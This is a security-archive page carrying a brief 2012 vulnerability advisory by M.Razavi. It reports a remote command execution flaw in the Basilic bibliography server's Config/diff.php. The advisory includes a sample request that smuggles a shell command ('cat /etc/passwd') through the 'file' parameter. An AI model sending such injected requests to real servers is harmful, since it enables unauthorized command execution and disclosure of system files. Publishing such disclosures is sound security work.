Basilic Remote Command Execution

Basilic Remote Command Execution: Posted Jun 30, 2012; Authored by M.Razavi; Basilic, the automated bibliography server, suffers from a remote command execution vulnerability.; tags | exploit, remote; SHA-256 | 755040781ca13a6b1edf74b5f503430d6657c3cd7c1127ef1310bb0e2d42433c; Download | Favorite | View

Basilic Remote Command Execution

Hi
Dear Sir

Basilic is  an Automated Bibliography Server for Research Publications Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Regards
M.Razavi

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
jheysel-r7 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,080)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,409)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,312)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,667)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

Basilic Remote Command Execution

Basilic Remote Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Basilic Remote Command Execution

Share This

Basilic Remote Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems